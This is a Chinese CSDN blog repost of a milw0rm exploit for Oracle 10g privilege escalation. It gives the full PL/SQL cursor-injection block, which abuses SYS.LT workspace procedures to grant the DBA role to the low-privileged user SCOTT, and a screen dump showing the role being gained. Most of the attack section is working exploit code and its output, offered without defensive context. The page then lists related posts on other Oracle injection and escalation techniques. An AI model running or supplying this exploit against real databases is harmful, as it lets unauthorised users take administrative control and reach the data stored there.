oracle10g提权,[exploit] Oracle 10G 提权

最新推荐文章于 2024-07-24 18:11:27 发布
最新推荐文章于 2024-07-24 18:11:27 发布
阅读量85 收藏
点赞数
文章标签: oracle10g提权
该博客详细介绍了Oracle数据库中的一种权限提升攻击,利用cursor注入技术,无需`CREATE FUNCTION`权限即可执行。攻击者通过声明自治事务,动态执行SQL语句,授予了SCOTT用户DBA权限。虽然尝试过程遇到了错误,但最终SCOTT用户成功获得了额外的权限,包括CONNECT、EXECUTE_CATALOG_ROLE和DBA。博客内容涉及数据库安全和SQL注入技术。
摘要由CSDN通过智能技术生成

This is slightly modified version of: http://milw0rm.com/exploits/7677

This is based on cursor injection and does not need create function privileges:

DECLARE

D NUMBER;

BEGIN

D := DBMS_SQL.OPEN_CURSOR;

DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);

SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');

SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');

end;

#-----------screen dump---------------------------------------------------#

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_

------------------------------ ------------------------------ --- --- ---

SCOTT                          CONNECT                        NO  YES NO

SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO

SCOTT                          RESOURCE                       NO  YES NO

SQL> DECLARE

2  D NUMBER;

3  BEGIN

4  D := DBMS_SQL.OPEN_CURSOR;

5  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme

diate ''grant dba to scott'';commit;end;',0);

6  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');

7  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');

8  end;

9

10

11  /

DECLARE

*

ERROR at line 1:

ORA-01403: no data found

ORA-06512: at "SYS.LT", line 6118

ORA-06512: at "SYS.LT", line 6087

ORA-06512: at line 7

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_

------------------------------ ------------------------------ --- --- ---

SCOTT                          CONNECT                        NO  YES NO

SCOTT                          DBA                            NO  YES NO

SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO

SCOTT                          RESOURCE                       NO  YES NO

Sid

www.notsosecure.com

#From:milw0rm

吃个生煎包
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracle10g漏洞,Oracle 10g DBMS_Scheduler权限提升漏洞
weixin_39638647的博客
04-09 253
受影响系统:Oracle database server 10g描述:--------------------------------------------------------------------------------BUGTRAQ ID: 13509Oracle是一款大型商用数据库软件。Oracle在用户访问权限的处理上存在漏洞,攻击者可能利用此漏洞提升权限。任何拥有CREATE J...
oracle普通用户使用dbms函数,DBMS_SQL是如何获取DBA权限的
weixin_39530288的博客
04-06 681
作者:安华金和 思成数据库攻击的目的最终是为要获取数据库中有价值的数据,而获取数据最有效的方法就是直接获取DBA权限。本文通过Oracle数据库中的一个经典漏洞,演示从普通用户提权到DBA权限的过程,DBSec Labs数据库安全实验室给出针对性的防护建议。Oracle漏洞分析CTXSYS.driload.validate_stmt是一个Oracle的经典漏洞。出现在Oracle9i中,从10g开...
oracle10g提权,Oracle 10g提权测试
weixin_33848693的博客
04-11 144
一直想摸索一下orcl提权的方式,今天测试了一下10g,可以成功提权。SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 10月 31 07:41:29 2016Copyright (c) 1982, 2005, Oracle. All rights reserved.连接到:Oracle Database 10g Enterprise Edition...
ORACLE linux提权,Linux提权
weixin_42503645的博客
04-04 488
上一次提权提到了内核漏洞本地提权,SUID提权,但是在面对复杂的服务器环境时需要了解更多的提权方法。上次在ny护网的时候搞到了一台Linux服务器的低权限oracle账号,然后尝试提权成功,所以有了这篇文章。低内核版本提权发行版本是rhel5.5内核版本是比较低的 2.6.18,但是脏牛漏洞是对内核版本大于2.6.22可以利用,所以我们可以利用tmp目录权限、suid 权限和C语言使普通帐号提权为...
oracle数据库注入提权,Oracle 低权限数据库账户得到 OS 访问权限 提权利用
weixin_32506743的博客
04-02 437
这几天看了篇叫"Penetration: from application down to OS (Oracle)"的文档,感觉挺有意思的,文档的 大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗服务器...
Oracle 10g提权测试
weixin_33724046的博客
10-31 193
一直想摸索一下orcl提权的方式,今天测试了一下10g,可以成功提权。 C:\wmpub>sqlplus scott/tiger@orcl SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 10月 31 07:41:29 2016 Copyright (c) 1982, 2005, Oracle....
ORACLE linux提权,linux命令常用合集,提权(转)
weixin_35761503的博客
04-04 194
常用9类命令文件目录类1.建立目录:mkdir 目录名2.删除空目录:rmdir 目录名3.无条件删除子目录: rm -rf 目录名4.改变当前目录:cd 目录名 (进入用户home目录:cd ~;进入上一级目录:cd -)5.查看自己所在目录:pwd6.查看当前目录大小:du7.显示目录文件列表:ls -l (-a:增加显示隐含目录)其中:蓝:目录;绿:可执行文件;红:压缩文件;浅蓝:链接文件;...
oracle10g漏洞,Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit v2
weixin_35795512的博客
04-09 252
#!/usr/bin/perl##RemoteOracleKUPM$MCP.MAINexploit(10g)#-Version2-New\"evilcursorinjection\"tip!#-No\"createprocedure\"privilegeneeded!#-See:http://www.databasesecurity.com/(...
Oracle_Attip_XML_Entity_ExploitOracle Attip XML实体利用
02-24
返回更多10kb的请求。 主题:XML实体扩展CVSSv3.0基本得分:5.3 CVSS向量:CVSS:3.0 / AV:N / AC:L / PR:N / UI:N / S:U / C:N / I:N / A:L 主题:OSB中的XML实体扩展缺陷CVSSv3.0基本得分:5.3 CVSS向量...
Oracle® 10g RAC Grid,Services & Clustering
04-27
Oracle Database 10g Release 2. Throughout the book, examples are provided with dump outputs followed by discussions and analysis into problem solving. The book also provides discussions on migrating ...
Oracle_XDB_FTP_PASS-Exploit:利用Oracle 9i XDB ftp密码缓冲区溢出漏洞
05-25
Oracle_XDB_FTP_PASS-Exploit 是针对Oracle 9i数据库系统中XDB(XML Database)组件的一个严重安全漏洞。这个漏洞主要出现在FTP服务模块,允许远程攻击者通过精心构造的FTP命令,触发密码缓冲区溢出,从而可能执行...
数据库手动注入到提权Oracle、PostgreSQL、联合查询、布尔注入、报错注入、延时注入、堆查询注入、带外注入、写WebShell)
墨痕诉清风的博客
07-24 608
Oracle类型判断PostgreSQL类型判断(特有的语法)
elk或efk日志报警elastalert-docker安装
08-28
elk或efk日志报警elastalert-docker安装
springboot185基于vue.js的客户关系管理系统(crm)的设计与实现.zip
08-28
现代经济快节奏发展以及不断完善升级的信息化技术,让传统数据信息的管理升级为软件存储,归纳,集中处理数据信息的管理方式。本客户关系管理系统就是在这样的大环境下诞生,其可以帮助管理者在短时间内处理完毕庞大的数据信息,使用这种软件工具可以帮助管理人员提高事务处理效率,达到事半功倍的效果。此客户关系管理系统利用当下成熟完善的SSM框架,使用跨平台的可开发大型商业网站的Java语言,以及最受欢迎的RDBMS应用软件之一的Mysql数据库进行程序开发。实现了用户在线选择试题并完成答题,在线查看考核分数。管理员管理字典管理、沟通记录管理、客户管理、客户积分管理、客户线索管理、员工管理、管理员管理等功能。客户关系管理系统的开发根据操作人员需要设计的界面简洁美观,在功能模块布局上跟同类型网站保持一致,程序在实现基本要求功能时,也为数据信息面临的安全问题提供了一些实用的解决方案。可以说该程序在帮助管理者高效率地处理工作事务的同时,也实现了数据信息的整体化,规范化与自动化。
PnP-WOPI-master.zip
08-28
office文件读写程序
基于python开发的一套内容管理系统
最新发布
08-28
python 【项目资源】:包含前端、后端、移动开发、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源,毕业设计等各种技术项目的源码。包括C++、Java、python、web、C#、EDA等项目的源码。 【适用人群】:适用于希望学习不同技术领域的初学者或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
爬取的淘宝热销(热门)外套商品信息公开透明数据集
08-28
本资源专注于收集淘宝平台热销(热门)外套商品信息,内容涵盖商品的店铺所在省份、城市位置、商品的名称、销售价格、累积销量、单价(以人民币计价)、付款的顾客人数、是否提供包邮服务、是否为天猫平台的商品,以及相关的满减优惠情况。这些详细的数据点均来源于淘宝平台的公开透明信息,经过精确抓取和整理,旨在为分析电商平台上的新品推荐策略和消费者购买行为提供实用数据。 这些数据严格遵循淘宝平台的公开政策和隐私保护原则获取,确保了信息的合法性与合规性。然而,本资源仅作为学习参考之用,意在帮助研究人员、市场分析师或学生等理解电商领域的商品推荐机制、销售动态及市场趋势。 任何将此数据用于商业目的或其他未授权的活动都是不恰当的,甚至可能触犯相关法律条款。 在使用这些数据进行学术研究或个人学习时,用户应自觉遵守相关法律法规,尊重数据来源和版权,正确引用数据源,并不得用于任何形式的商业盈利。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值